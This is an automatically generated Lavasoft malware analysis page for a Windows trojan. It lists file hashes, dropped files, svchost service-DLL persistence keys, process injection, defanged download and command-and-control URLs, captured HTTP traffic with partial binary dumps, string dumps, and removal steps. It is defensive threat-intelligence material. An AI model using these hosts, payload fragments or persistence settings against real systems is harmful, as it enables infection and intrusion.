Trojan.Win32.FlyStudio_3dd12f58ca

by malwarelabrobot on July 26th, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!3DD12F58CA3C (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGC17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 3dd12f58ca3c7a70343e038f04558ea6
SHA1: e093417060a56e3ed897b40af7dd3e24d21108c6
SHA256: 71b7133a780ba81f26681b76d9f6b414f47789c6e256a7ed3da1e1e169422bbb
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObfC:2PmDqL8n75zYGWr9nTjfC
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:4032

The Trojan injects its code into the following process(es):

tip.exe:3908

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (12669 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (9060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin (61717 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin (48705 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "E0 BE 6B 5B 65 05 D3 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "E0 BE 6B 5B 65 05 D3 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\3dd12f58ca3c7a70343e038f04558ea6_RASAPI32]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@D2B9.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@D2B9.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 34
0993637493f3b7d48e60406846b67cd2
866a663983df6eb9f173e738b7492af5
fe1190b636e01304dfea8c5985a676ae
fff5b97e7de8f602d3d0749880184afe
6dcfa3790537394ba27309980b26c6a9
b3b68d037f5ada39b8c815e7763963ef
559815f0958d0d56ef805ac06a4ecea4
2129f218596a99ecf0b8bc9930ce2f05
f490d78f241cef804d76dbc508da32cf
fdd3c156fcf06e0a8d1811f88c679446
06626e0fe5c2fbc2845f7c5f7c95ce81
d85e9bb1ca7f50942b739f9aa9aff2f9
f675f7d3926014be4374360a8e0b2b85
e897d3f6c6b12ec4ddb75156fa6e5dc5
6c877d78dc6550ff99e7d85f869890f8
043e9f7631f4e6b66c1cd7c10c54e798
04926704a0652a9a474cf32bd3082d70
7c91e2d9cb04086a0d715c28f0bbdee7
0c19e99da34fe4be304b712e12aa62d6
80bcb1c0eee0431acf6c8bf9828b43ac
679ca4072db9508e6edf9cfab4efa11a
f871cbafed0b12bc181da00ce3f04760
a695e4bbbf3cf947db4ab8c873014d78
ec0e3b12571ddf6455aba7359f2b0026
7e2d1a154abe935292cb3b3ce5b4cbb2
8a34168adfebf655291073a2b140789f

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
teredo.ipv6.microsoft.com 157.56.120.207
api.knsdknknndnfjenkjwwlekfj.com 108.61.212.148
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:00 GMT
Content-Length: 974336
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
....|o......|o..U...|o......[.......[.......[.........d.............s.
......s.......s.......Rich............................PE..L.....vY....
.......!.....X...........".......p............................... ....
........@.........................PF.......F..........................
.........o......8...........................H...@............p........
.......................text....V.......X.................. ..`.rdata..
.....p.......\..............@..@.data...x:...`...(...D..............@.
...tls.................l..............@....reloc...o.......p...n......
........@..B..........................................................
......................................................................
......................................................................
......................................................................
.............................................P....fJ..h.d....`........
.d.........P.....#...Y......................&J..h.d...................
...............Y.......................I..h.d.........................
.........Y.......................I..h.d..............................c
...Y......................fI..j.h.....................................
J1..h.e.......Y......................I..j.h...........................
...........0..h e.......Y................ .....H..j.h..... .....0.....
....4......... ......0..h@e...r...Y................8....vH..j.h...
<<< skipped >>>

GET /tip.bin HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:06 GMT
Content-Length: 304640
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........;...U...U.
..U...Y...U.m.[...U..._.U.U...^...U...F...U...F...U...T...U...^...U...
_...U...U...U.).S...U.Rich..U.........................PE..L....DKY....
................. .......|............@...............................
......................................................................
......................................................................
......................UPX0....................................UPX1....
............................@....rsrc.... ..........................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....h./wb<.j.Y.......P..&$...m..3...U..h....j.h...j
...o..i...h.R....@......$..m..(.....@..]..m...&..}.f.E....f.E..m..}m..
...$..U.M^.Ku...\..v........e....g9"t.....h..a...`5J.Q...K.d.5h..h0...
.q...W....]...{{.w..]..t.....e. ...M..`.D.l@j.j.G.....y.....-...{(l...
.%......G......k).Z4...P..d! C...."I*C.@_.P.... *.h..$9hx.L._..u...%.=
...d..u.J.....t..g....A..t;.u.......~.....3............t..A.L&..t...p.
.....t....A. ........s.*..@... ..<$Q.E..{.W.u......QW.Y..W.......Iu
.zS[.X..7E..$W.UV...2.....H;..^<...XA....6(.....f..9..gp .v<
<<< skipped >>>


GET /api/report HTTP/1.1
Server: TfMEeov7vdA7nOAqmd6mZmvXjVjd87jd3m8oD7gO2mRb3mebZmcoZSFS6O2EA76oRq0qZmJSjdcO4STSjVFq6mcqMEeoT7eOcfDbbORXzS8XDf4ojfcfMEJmpS7VXoFmE74mRqZXPSREGE4q0qFq4qPSFETSEdvS77REjqFXvEFmebGq4qHbrVGX4S4X4bCo6mHm8XeVDd3dME3SMEQ7s7nOjf4oefwdgqGbpmJ7wb2S8XTd
Server-Key: bmESqXrCo7VfOdalIB1xiL5tQhuKUY9NMpD6gyA8cjsknHPzv4FZR2eGw3TJ0W
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: 76peoPhXCFijbgnmRLyIqxOvDM1uYlB3dk9wTr0aQ2EzWH5ZsJ8StNV4KfUcGA
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:00 GMT
[DATA]76peoPhXCFijbgnmRLyIqxOvDM1uYlBwiHiQitigiHijiHi8iHijiHispHiQitij
iti8pHi8iHiSiHiIiHispHi4ptiQitiRiHispHiIiHiIiHi8iHiriHispHiQitijitiQit
ieiHi0iHiKiHiSiHibiHi4iHi8iHijiHispHicptieiHi8iHijiHi8iHiQiti2iAi3dk9w
Tr0aQ2EzWH5ZsJ8StNV4KfUcGA[DATA]HTTP/1.1 200 OK..Cache-Control: no-cac
he..Pragma: no-cache..Content-Length: 242..Content-Type: text/plain; c
harset=Windows-1252..Expires: -1..Server: Microsoft-IIS/8.5..Server-Ke
y: 76peoPhXCFijbgnmRLyIqxOvDM1uYlB3dk9wTr0aQ2EzWH5ZsJ8StNV4KfUcGA..X-A
spNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 25 Jul 201
7 16:45:00 GMT..[DATA]76peoPhXCFijbgnmRLyIqxOvDM1uYlBwiHiQitigiHijiHi8
iHijiHispHiQitijiti8pHi8iHiSiHiIiHispHi4ptiQitiRiHispHiIiHiIiHi8iHiriH
ispHiQitijitiQitieiHi0iHiKiHiSiHibiHi4iHi8iHijiHispHicptieiHi8iHijiHi8
iHiQiti2iAi3dk9wTr0aQ2EzWH5ZsJ8StNV4KfUcGA[DATA]....


GET /api/ip HTTP/1.1


User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 25 Jul 2017 16:45:11 GMT
Content-Length: 71
{"ip":"194.242.96.226","iso_code":"UA","en":"Ukraine","cn":"........."
}HTTP/1.1 200 OK..Cache-Control: no-cache..Pragma: no-cache..Content-T
ype: application/json; charset=utf-8..Expires: -1..Server: Microsoft-I
IS/8.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue,
 25 Jul 2017 16:45:11 GMT..Content-Length: 71..{"ip":"194.242.96.226",
"iso_code":"UA","en":"Ukraine","cn":"........."}..

The Trojan connects to the servers at the folowing location(s):

svchost.exe_4048:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_3908:

`.rsrc
t$(SSh
~%UVW
u$SShe
Hw2.Hw
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)

tip.exe_3908_rwx_00401000_000B6000:

t$(SSh
~%UVW
u$SShe
Hw2.Hw
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:4032

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (12669 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (9060 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\report[1].txt (242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\dll_service[1].bin (61717 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\tip[1].bin (48705 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now